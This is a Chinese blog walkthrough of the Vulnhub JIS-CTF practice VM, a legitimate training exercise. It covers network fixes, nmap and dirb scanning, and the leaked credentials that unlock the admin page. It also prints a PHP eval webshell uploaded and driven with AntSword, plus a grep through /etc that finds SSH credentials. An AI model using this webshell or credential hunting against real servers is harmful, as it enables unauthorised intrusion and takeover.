首页 > 其他分享 >VulnhubJIS-CTF靶机详解

VulnhubJIS-CTF靶机详解

时间:2024-08-11 21:24:01浏览次数:13  
标签:47.144 flag VulnhubJIS 访问 CTF 192.168 靶机 txt

项目地址

https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

修改靶机的网卡

开机时长按shift,进入此页面

image.png

选择第二个,进入

image.png

等待加载完成

image.png
image.png

选择root模式进入

将只读模式改为读写模式
mount -o remount,rw /

查看本机的网卡名称
ifconfig -a

image.png

修改默认网卡
vi /etc/network/interfaces

image.png

wq!保存退出,reboot重启即可

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

image.png

使用nmap进行主机发现,获取靶机IP地址

nmap 192.168.47.1-254

image.png

根据对比可知JIS-CTF的一个ip地址为192.168.47.144

扫描JIS-CTF的操作系统,端口及对应服务

nmap -A -p- 192.168.47.144

image.png

发现开放22端口和80端口

访问网站

image.png
进入了一个登录界面
但是不知道账号密码

对网站进行目录枚举

dirb http://192.168.47.144

image.png
发现存在一个robots.txt和一个flag网站
访问一下

访问http://192.168.47.144/flag

image.png

得到了第一个flag

访问http://192.168.47.144/robots.txt

image.png
对文件中的网站进行逐一访问

只在/admin_area网站里面存在一句话

image.png
存疑,感觉有问题

查看网站的源码

image.png

得到了第二个flag以及一个账号密码

回到登陆界面尝试登录

image.png
成功登录
发现可以上传文件

写一个一句话木马上传

<?php eval($_POST['cmd']); ?>

image.png
image.png
image.png
上传成功
通过robots.txt可知,文件上传到uploaded_files里面

蚁剑连接

image.png
连接成功

寻找文件

image.png

发现了一个flag.txt

打开是空的
image.png

使用命令查看

image.png
没有权限
再看看其他的

在hint.txt发现了第三个flag

image.png
文件里面提到尝试使用 technawi 用户名和密码 来查看flag.txt文件
之前扫描ip开放了22端口

尝试使用ssh进行连接

image.png
发现需要密码

在蚁剑里面寻找一下
cat /etc/passwd

image.png
x说明密码在shadow里面保存
image.png
没有权限访问被拒

尝试扫描关键字来查找密码
grep -r technawi  /etc/

image.png
扫到了,在credentials.txt文件里
image.png

得到了第四个flag以及ssh的登录账号密码

ssh连接

image.png
连接成功

直接访问html目录下的flag.txt
cat /var/www/html/flag.txt

image.png

得到最后一个flag

image.png

标签:47.144,flag,VulnhubJIS,访问,CTF,192.168,靶机,txt
From: https://blog.csdn.net/weixin_62457642/article/details/141112229

相关文章

  • HTB-Permx靶机笔记
    Permx靶机笔记概述permx靶机是HTB的简单靶机,这台靶机整体考验渗透人员的信息搜集能力,可以收只有信息搜集的快速,才能快速拿到它的flag。整体是比较简单的靶机靶机连接:https://app.hackthebox.com/machines/PermX一、nmap扫描1)端口扫描nmap-sT--min-rate10000-p--......
  • BUUCTF 81题吹着贝斯的二维码详解(包含各类工具和python脚本)
    在网上看了很多类似解题步骤和说明,感觉对小白都不友好,于是决定搜集整理下,做个详尽的解题步骤:压缩包解压得到36个无后缀名文件和一个flag.zip压缩包再看压缩包,解压发现有压缩密码,用winhex查看是不是伪加密,在末尾发现一串可疑字符串,拷贝下来留用:GNATOMJVIQZUKNJXGRCTGNRTG......
  • Buuctf不眠之夜-拼图题gasp自动拼图软件实现
        解压后发现有122个文件,其中有一个坏掉的图片和一个无后缀名文件,120个200x100图片拼成一个长方形大图,估计10x12,图大小20001200看了好多文章,一看是拼图题,就自己手动去拼,我就头大。搜了相关知识,知道有个gaps的自动拼图软件可以秒拼图,但是安装在kali里巨麻烦,我在......
  • Buuctf 弱口令详解附送图片隐写工具cloacked-pixel安装配置使用实列
    下载一个zip压缩包,解压需要密码,使用bandizip,打开看看,发现注释栏有一些隐藏的东西ctl+c复制在粘贴板,再ctl+v黏贴到sunblime文本编辑软件下是摩斯密码,记录下来......-...-..-----..-.---.-...---在线摩斯密码翻译器HELL0FORUM用此作为密码解压压缩包......
  • Buuctf从娃娃抓起解题(不一样的思路)
        这道题很简单,主要涉及密码学,要熟悉掌握两种密码形式,看了好多网友解题,感觉思路不清,解题没有说服力,我简单归纳整理一下。压缩包解压得到两个文本文档,要把这两段密文转为汉字,再用MD532位小写加密,提交格式flag{MD5}中文电码查询查询结果:人工智能五笔码查询......
  • Buuctf-Mysterious另类逆向题解
    下载发现是一个exe可执行文件双击运行,输入密码123456没有任何反应,当然没反应,密码肯定不对请出IDApro,我这里用IDAProv8.3演示,把exe文件拖拽到IDA打开按shift+F12快捷键搜索字符串我们发现第二行有可疑字符串,有flag嫌疑,双击上面的welldonewelldone里“Buff3r_0......
  • HTB-Permx靶机笔记
    Permx靶机笔记概述permx靶机是HTB的简单靶机,这台靶机整体考验渗透人员的信息搜集能力,可以收只有信息搜集的快速,才能快速拿到它的flag。整体是比较简单的靶机靶机连接:https://app.hackthebox.com/machines/PermX一、nmap扫描1)端口扫描nmap-sT--min-rate10000-p--oport......
  • dpwwn-01靶机笔记
    dpwwn-01靶机笔记概述这是一台Vulnhub的靶机,主要在web方面,我们无法找到突破口时,应该怎样抉择mysql和ssh的爆破,以及弱口令的尝试。我这里准备了连接,当然你也可去Vulnhub平台自己下载dpwwn-01靶机:https://pan.baidu.com/s/1P5Peude95xYcsUsKd0_55w?pwd=8v4h提取码:8v4h一、nmap......
  • [HDCTF2019]MFC
    第一次遇到mfc类的题目,写个blog记录一下首先了解一下什么是mfc,百度百科上是这么写的:MFC(MicrosoftFoundationClasses),是微软公司提供的一个类库(classlibraries),以C++类的形式封装了Windows的API,并且包含一个应用程序框架,以减少应用程序开发人员的工作量。其中包含的类包含大......
  • BugKu CTF Misc:眼见非实 & 啊哒 & ping & Snowfall
    前言BugKu是一个由乌云知识库(wooyun.org)推出的在线漏洞靶场。乌云知识库是一个致力于收集、整理和分享互联网安全漏洞信息的社区平台。BugKu旨在提供一个实践和学习网络安全的平台,供安全爱好者和渗透测试人员进行挑战和练习。它包含了各种不同类型的漏洞场景,如Web漏洞、系统......